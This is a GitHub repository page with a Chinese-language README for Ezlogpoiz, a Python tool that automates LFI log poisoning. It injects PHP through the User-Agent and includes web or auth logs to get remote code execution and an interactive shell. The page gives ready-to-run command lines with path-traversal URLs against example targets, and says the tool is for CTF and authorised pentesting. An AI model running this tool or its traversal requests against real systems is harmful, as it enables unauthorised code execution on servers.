BatuhanBaskurt/Ezlogpoiz
GitHub: BatuhanBaskurt/Ezlogpoiz
一款自动化 LFI 日志投毒工具,通过向请求头注入 PHP payload 并利用文件包含触发执行,实现远程代码执行并获取交互式 shell。
Stars: 0 | Forks: 0
# EZLOGPOIZ
```
/$$$$$$$$ /$$$$$$$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$$$
| $$_____/|_____ $$ | $$ /$$__ $$ /$$__ $$| $$__ $$ /$$__ $$|_ $$_/|_____ $$
| $$ /$$/ | $$ | $$ \ $$| $$ \__/| $$ \ $$| $$ \ $$ | $$ /$$/
| $$$$$ /$$/ | $$ | $$ | $$| $$ /$$$$| $$$$$$$/| $$ | $$ | $$ /$$/
| $$__/ /$$/ | $$ | $$ | $$| $$|_ $$| $$____/ | $$ | $$ | $$ /$$/
| $$ /$$/ | $$ | $$ | $$| $$ \ $$| $$ | $$ | $$ | $$ /$$/
| $$$$$$$$ /$$$$$$$$| $$$$$$$$| $$$$$$/| $$$$$$/| $$ | $$$$$$/ /$$$$$$ /$$$$$$$$
|________/|________/|________/ \______/ \______/ |__/ \______/ |______/|________/
```
**LFI Log Poisoning 工具** — 为 CTF 与 Pentest 编写的 Python 脚本。
## 功能介绍?
在存在 LFI(Local File Inclusion)漏洞的目标上,通过 log poisoning 方法实现 RCE(Remote Code Execution),并开启交互式 shell。
**工作原理:**
1. 向 User-Agent 写入 PHP payload(poison)
2. 通过 LFI 包含日志文件(trigger)
3. 清晰展示命令输出(shell)
## 安装
```
git clone https://github.com/BatuhanBaskurt/ezlogpoiz
cd ezlogpoiz
pip install -r requirements.txt
```
## 使用方法
```
python3 ezlogpoiz.py --url "http://hedef.com/index.php?page=../../../var/log/apache2/access.log"
```
**所有选项:**
| 参数 | 说明 | 示例 |
|-----------|----------|-------|
| `--url` | LFI URL(必填) | `--url "http://hedef.com?page=../../../var/log/apache2/access.log"` |
| `-u` | 用户名(Basic Auth) | `-u admin` |
| `-p` | 密码(Basic Auth) | `-p admin` |
| `-c` | Cookie | `-c "PHPSESSID=abc123"` |
**示例:**
```
# 基本使用
python3 ezlogpoiz.py --url "http://10.10.10.10/index.php?page=../../../var/log/apache2/access.log"
# 使用 Basic Auth
python3 ezlogpoiz.py --url "http://10.10.10.10/index.php?page=../../../var/log/apache2/access.log" -u admin -p admin
# 使用 Cookie
python3 ezlogpoiz.py --url "http://10.10.10.10/index.php?page=../../../var/log/apache2/access.log" -c "PHPSESSID=abc123"
# Nginx 日志
python3 ezlogpoiz.py --url "http://10.10.10.10/index.php?page=../../../var/log/nginx/access.log"
# SSH auth 日志
python3 ezlogpoiz.py --url "http://10.10.10.10/index.php?page=../../../var/log/auth.log"
```
## 环境要求
- Python 3.x
- requests
```
pip install requests
```
## 法律声明
本工具仅为 **CTF 比赛**和**授权的 pentest** 工作而开发。在未经授权的系统上使用是非法的。开发者不承担任何责任。
## 许可证
MIT License — 版权所有 (c) 2026 Batuhan Başkurt
标签:Apache日志利用, CISA项目, CTF工具, LFI, Log Poisoning, Maven, Python, RCE, User-Agent注入, Webshell, Web安全, 命令执行, 安全测试, 攻击性安全, 无后门, 无线安全, 日志注入, 本地文件包含, 漏洞搜索, 漏洞验证, 编程工具, 网络安全, 蓝队分析, 远程代码执行, 逆向工具, 隐私保护